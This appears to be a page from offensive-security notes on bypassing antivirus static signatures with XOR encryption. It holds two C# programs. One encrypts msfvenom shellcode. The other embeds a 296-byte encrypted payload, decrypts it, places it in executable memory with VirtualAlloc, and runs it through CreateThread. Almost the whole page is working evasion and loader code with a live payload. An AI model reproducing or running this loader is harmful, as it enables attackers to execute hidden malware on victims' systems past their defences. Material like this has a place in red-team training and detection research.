Static Analysis

Bypassing Static signatures

Encryption

XOR Encryption

#XOR_Encryptor.cs

using System;
using System.Text;
using System.IO;

public class Program
{
	private static byte[] xor(byte[] code)
	{
		byte[] key = Encoding.ASCII.GetBytes("Secret string");
		byte[] xored = new byte[code.Length];
		
		for (int i = 0; i < code.Length; i ++)
		{
			xored[i] = (byte)(code[i] ^ key[i % key.Length]);
		}
		return xored;
	}
	
	static void Main()
	{
		Console.WriteLine("[+] XOR Encryptor initiated.");
		
		//Insert msfvenom generated shell code
		//byte[] shellcode = new byte[xxx] { };
		
		byte[] crypted_code = xor(shellcode);
		StringBuilder res = new StringBuilder();
		
		res.Append("byte[] shellcode = new byte[" + shellcode.Length + "] { ");
		
		for (int i = 0; i < shellcode.Length; i++)
		{
			res.Append("0x");
			res.AppendFormat("{0:x2}", crypted_code[i]);
			
			if (i < shellcode.Length - 1)
			{
				res.Append(", ");
			}		
		}
			
		res.Append(" }");
		Console.WriteLine("[+] Shellcode successfully encrypted");
		Console.WriteLine(res.ToString());
		return;
	}
}
using System;
using System.Text;
using System.IO;
using System.Runtime.InteropServices;

namespace XORShellRunner
{
	
	public class Program
	{
		[DllImport("kernel32")]
		public static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
	
		[DllImport("kernel32")]
		private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
	
		[DllImport("kernel32")]
		private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);	
	
		private static byte[] xor(byte[] code)
		{
			byte[] key = Encoding.ASCII.GetBytes("Secret string");
			byte[] xored = new byte[code.Length];
			
			for (int i = 0; i < code.Length; i++)
			{
				xored[i] = (byte)(code[i] ^ key[i % key.Length]);
			}
			return xored;
		}
		
		private static void display(byte[] code)
		{
			StringBuilder res = new StringBuilder();
		
			res.Append("shellcode = new byte[" + code.Length + "] { ");
		
			for (int i = 0; i < code.Length; i++)
			{
				res.Append("0x");
				res.AppendFormat("{0:x2}", code[i]);
				
				if (i < code.Length - 1)
				{
					res.Append(", ");
				}		
		}	
			res.Append(" }");
			Console.WriteLine("-------------------------------------------------\n");
			Console.WriteLine(res.ToString());
			Console.WriteLine("\n-------------------------------------------------\n");
		}
		
		static void Main()
		{
			//XOR encrypted payload generated from msfvenom
			byte[] cipher = new byte[296] { 0xaf, 0x2d, 0xe0, 0x96, 0x95, 0x9c, 0xe0, 0x73, 0x74, 0x72, 0x28, 0x3f, 0x26, 0x03, 0x37, 0x32, 0x24, 0x2d, 0x45, 0xf2, 0x16, 0x3c, 0xf9, 0x3b, 0x0e, 0x2f, 0xd8, 0x37, 0x7b, 0x3a, 0xee, 0x26, 0x00, 0x3b, 0xff, 0x00, 0x39, 0x26, 0x68, 0xe4, 0x2f, 0x29, 0x3f, 0x54, 0xbd, 0x68, 0x42, 0xb4, 0xde, 0x55, 0x0f, 0x1b, 0x51, 0x49, 0x43, 0x33, 0xa4, 0xbd, 0x2d, 0x32, 0x75, 0xb3, 0x8b, 0x83, 0x35, 0x12, 0x34, 0x2b, 0xf9, 0x37, 0x54, 0xab, 0x31, 0x48, 0x3a, 0x68, 0xbe, 0xec, 0xd3, 0xed, 0x63, 0x72, 0x65, 0x3c, 0xa5, 0xb3, 0x00, 0x15, 0x21, 0x6f, 0xb7, 0x03, 0xee, 0x2b, 0x6a, 0x21, 0xff, 0x60, 0x53, 0x3d, 0x73, 0xb9, 0x8d, 0x31, 0x1b, 0x9a, 0xaa, 0x33, 0xee, 0x40, 0xa8, 0x3b, 0x75, 0xa4, 0x24, 0x5f, 0xae, 0x1b, 0x54, 0xa3, 0xde, 0x24, 0xb5, 0xe9, 0x7e, 0x35, 0x73, 0xa8, 0x56, 0x87, 0x26, 0x94, 0x2f, 0x71, 0x29, 0x50, 0x28, 0x36, 0x4d, 0xa3, 0x1c, 0xb6, 0x3f, 0x17, 0xee, 0x23, 0x56, 0x2c, 0x75, 0xf0, 0x15, 0x35, 0xf9, 0x65, 0x26, 0x23, 0xd8, 0x25, 0x7f, 0x3b, 0x64, 0xa4, 0x61, 0xf8, 0x70, 0xfa, 0x21, 0x6f, 0xb7, 0x12, 0x3d, 0x22, 0x2a, 0x3b, 0x2d, 0x7a, 0x32, 0x2c, 0x33, 0x30, 0x2f, 0x3d, 0x1b, 0xe6, 0x8f, 0x52, 0x24, 0x26, 0xdf, 0x93, 0x2c, 0x33, 0x30, 0x34, 0x2f, 0xd8, 0x77, 0x8a, 0x25, 0x9a, 0x8b, 0xdf, 0x2e, 0x3c, 0xc8, 0x68, 0x6e, 0x67, 0x53, 0x65, 0x63, 0x72, 0x65, 0x3c, 0xad, 0xfe, 0x75, 0x73, 0x69, 0x6e, 0x26, 0xe9, 0x54, 0xe8, 0x1d, 0xe2, 0x8b, 0xf5, 0xc8, 0x84, 0xc7, 0xcb, 0x38, 0x26, 0xe9, 0xc3, 0xf6, 0xcf, 0xf8, 0x8b, 0xf5, 0x3b, 0xf7, 0xb6, 0x41, 0x52, 0x61, 0x2f, 0x6f, 0xe3, 0x89, 0x85, 0x01, 0x25, 0xc8, 0x33, 0x61, 0x1b, 0x01, 0x0d, 0x53, 0x3c, 0x22, 0xfb, 0xbf, 0x8b, 0xf5, 0x10, 0x4e, 0x2e, 0x1e, 0x07, 0x09, 0x37, 0x0a, 0x14, 0x01, 0x39, 0x07, 0x59, 0x00, 0x00, 0x17, 0x04, 0x5d, 0x55, 0x0f, 0x06, 0x02, 0x1e, 0x06, 0x5a, 0x45, 0x0b, 0x11, 0x72 };			
			Console.WriteLine("[+] Encrypted shellcode:");
			display(cipher);
			
			Console.WriteLine("[+] Decryption initiated");
			byte[] shellcode = xor(cipher);
			Console.WriteLine("[+] Decrypted shellcode:");
			display(shellcode);
			
			UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x1000, 0x40);
			Console.WriteLine("[+] Memory allocated using VirtualAlloc: {0}", funcAddr);
			
			Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
			Console.WriteLine("[+] Payload copied to memory using Marshal.Copy");
			
			IntPtr hThread = IntPtr.Zero;
			UInt32 threadId = 0;
			IntPtr parameter = IntPtr.Zero;
			hThread = CreateThread(0, 0, funcAddr, parameter, 0, ref threadId);
			Console.WriteLine("[+] Thread created using CreateThread: {0}", hThread);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
		
		
	}
}

Programming Projects

PreviousDynamic AnalysisNextGeneral

Last updated